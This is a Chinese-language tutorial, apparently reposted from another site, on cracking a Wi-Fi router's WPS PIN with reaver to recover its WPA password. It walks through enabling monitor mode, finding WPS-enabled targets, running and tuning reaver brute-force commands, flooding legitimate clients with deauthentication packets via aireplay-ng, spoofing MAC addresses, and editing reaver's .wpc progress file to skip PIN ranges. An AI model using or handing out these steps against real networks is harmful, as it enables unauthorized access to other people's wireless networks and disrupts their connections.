reaver跑pin碼wpc文件的修改


reaver跑路由器pin碼過程:(root權限下)

1 輸入:airmon-ng start wlan0 開啟監聽模式

2 輸入:wash -i mon0 -C 查看所有開啟WPS的無線路由 長時間無反應按Ctrl+C,結束進程,這時記下你要PJ的目標路由MAC.

3 輸入:airodump-ng mon0 網卡以混雜模式掃描所有頻道—並顯示所有AP的信息(包括 AP的信號強度,ESSID,MAC,頻道,加密方式,等等…..),按Ctrl+C,結束掃描.

4 輸入:reaver -i mon0 -b MAC -a -S -vv 開始窮舉pin碼

  reaver 參數詳解:

  -i, –interface=<wlan> Name of the monitor-mode interface to use
    網卡的監視接口,通常是mon0(必需)
  -b, –bssid=<mac> BSSID of the target AP
    AP的MAC地址(必需)

  -c, –channel=<channel> Set the 802.11 channel for the interface (implies -f)
    信號的頻道,如果不指定會自動掃描,如-c1 指定1頻道(常用)

  -a, –auto Auto detect the best advanced options for the target AP
    對目標AP自動檢測高級參數,自動檢測目標AP最佳配置(常用)

  -v, –verbose Display non-critical warnings (-vv for more)
    顯示不重要警告信息 -vv 可以顯示更多(常用)

  -S 使用最小的DH key,可以提高PJ速度(常用)

  -t 即timeout每次窮舉等待反饋的最長時間(常用)

  -s, –session=<file> Restore a previous session file
    恢復進度文件

  -N, –no-nacks Do not send NACK messages when out of order packets are received
    不發送NACK信息

  -n, –nack Target AP always sends a NACK [Auto]
    對目標AP總是發送NACK,默認自動

  -f, –fixed Disable channel hopping
    禁止頻道跳轉

  -p, –pin=<wps pin> Use the specified 4 or 8 digit WPS pin
    使用指定的4位或者8位pin碼,可以用8位直接找到密碼(常用)
  -d, –delay=<seconds> Set the delay between pin attempts [1]
    pin間延時,默認1秒(常用)
  -l, –lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
    AP鎖定WPS后等待時間
  -g, –max-attempts=<num> Quit after num pin attempts
    最大pin次數

  -q, –quiet Only display critical messages
    只顯示關鍵信息

  -h, –help Show help
    顯示幫助

  

因狀況調整參數(-c后面都已目標頻道為1作為例子)
目標信號非常好:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d0  -c 1
目標信號普通:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d2  -t .5  -c 1
目標信號一般:  reaver  -i  mon0  -b MAC  -a  -S  -vv  -d5  -c 1

常見問題的處理:

1.如果出現超長的WPA PSK可以使用第四條命令“reaver –i mon0 –b MAC –p WPA PSK”
MAC為目標的mac地址,WPA PSK為獲取到的超長密碼。作用是將指定的pin碼獲取
wpa密碼psk。

2.reaver -i mon0 -b MAC -p PIN8位數

直接由pin碼得到psk密碼

3.90.9%進程后出現問題或卡死,請記下PIN前四位數,重新跑后三位數,如果前四位正確的話
  reaver -i mon0 -b MAC -p PIN前4位數

4.PIN僵死鎖定后的方法。也可以攻擊隱藏ssid的路由 aireplay-ng-0 1000 -a SSID 的MAC -c 合法客戶端的MAC 網卡端口

 就是讓客戶端斷開連接1000次macchanger

pin碼的進度文件保存在/usr/local/etc/下,XXXXXXXXXXXX.wpc (MAC地址為文件名)

MAC.wpc結構
0                  //第一行,這個地方是說它的前4位PIN碼的進度位置數
0                  //第二行,這個地方是說后3位PIN數的已經運行測試位置數
0                  //第三行,0時沒有找到,當為1時找到前四位,當為2時全部找到.
1234
0123
1111
2222
3333
.......
.......

 

如我們要從2000開始pin,你可以將第一行修改為2004,這樣它就會從2000開始PIN了.

命令是這樣的  reaver -i mon0 -b xx:xx:xx:xx:xx -a -S -vv -s /usr/local/etc/XXXXXXXXXXXX.wpc , 小寫的-s后面跟進度文件的路徑.

 

                                                    參考自這里


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM